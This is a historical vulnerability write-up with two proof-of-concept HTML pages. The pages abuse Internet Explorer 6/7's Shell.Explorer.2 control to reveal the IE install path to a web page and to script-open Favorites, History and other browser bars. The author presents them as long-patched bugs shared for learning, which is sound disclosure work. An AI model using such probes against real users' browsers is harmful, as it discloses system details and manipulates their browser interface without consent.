WebBrowser Control - Get IE Path and ShowBands

The Shell.Explorer.2 ActiveX exposes a FullName property that returns the full path to the IE executable on disk. The same control’s ShowBrowserBar method lets a page script open IE’s built-in toolbars — Search, Favorites, History, Channels — without any user gesture. Neither of these felt like intended behavior for Internet Zone content.

Getting the IE executable path:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE>Getting Information from the WebBrowser</TITLE></HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
<H2>Getting Information from the WebBrowser Control:</H2>
Works in IE6 and IE7. In this case, we are getting the full path to the IE executable, but you can use several methods that -I believe-
should not be allowed: ShowBrowserBar is an example. You can show to the user the registered Bands, the "Did you know?" message, search,
favorites, history, channels, etc. Maybe this is not a bug (opening those by scripting), so if that's the case, my mistake and ignore
this little thing.

<BR><BR>
The Code:<BR><BR>

var aX=new ActiveXObject('Shell.Explorer.2');<BR>
alert(aX.FullName);<BR>

</FONT>
<SCRIPT LANGUAGE="JavaScript">
var aX=new ActiveXObject('Shell.Explorer.2');
alert(aX.FullName);
</SCRIPT>
</BODY>
</HTML>

Showing browser bars via script:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE>Capture Events from the WebBrowser</TITLE></HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
<H2>ShowBands with WebBrowser Control:</H2>
Works in IE6 by default. In IE7, you will get the GoldBar because of the ActiveX.<BR><BR>
<BR>
</FONT>
<SCRIPT LANGUAGE="JavaScript">
var currentDir=location.href.substring(0,location.href.lastIndexOf('/')+1);
var strMyControl='<OBJECT ID="myControl" height="1" width="1" classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2">'+
'<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">'+
'<PARAM NAME="Location" VALUE="'+currentDir+'file_not_needed.html">'+
'</OBJECT>';
document.write(strMyControl);
function showBand(clsID)
{
	document.all.myControl.ShowBrowserBar(clsID, true);
}
</SCRIPT>
<INPUT TYPE="BUTTON" ONCLICK="showBand('{4D5C8C25-D075-11d0-B416-00C04FB90376}')" VALUE="Tip of the Day">
<INPUT TYPE="BUTTON" ONCLICK="showBand('{30D02401-6A81-11D0-8274-00C04FD5AE38}')" VALUE="Search">
<INPUT TYPE="BUTTON" ONCLICK="showBand('{EFA24E61-B078-11D0-89E4-00C04FC9E26E}')" VALUE="Favorites">
<INPUT TYPE="BUTTON" ONCLICK="showBand('{EFA24E62-B078-11D0-89E4-00C04FC9E26E}')" VALUE="History">
<INPUT TYPE="BUTTON" ONCLICK="showBand('{EFA24E63-B078-11D0-89E4-00C04FC9E26E}')" VALUE="Channels">
</BODY>
</HTML>

The FullName property is a straightforward information disclosure — a web page shouldn’t be able to determine where IE is installed on the filesystem. The ShowBrowserBar calls are less severe but still undesirable: a page script being able to forcibly open the user’s Favorites or History panel is an unexpected UI manipulation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.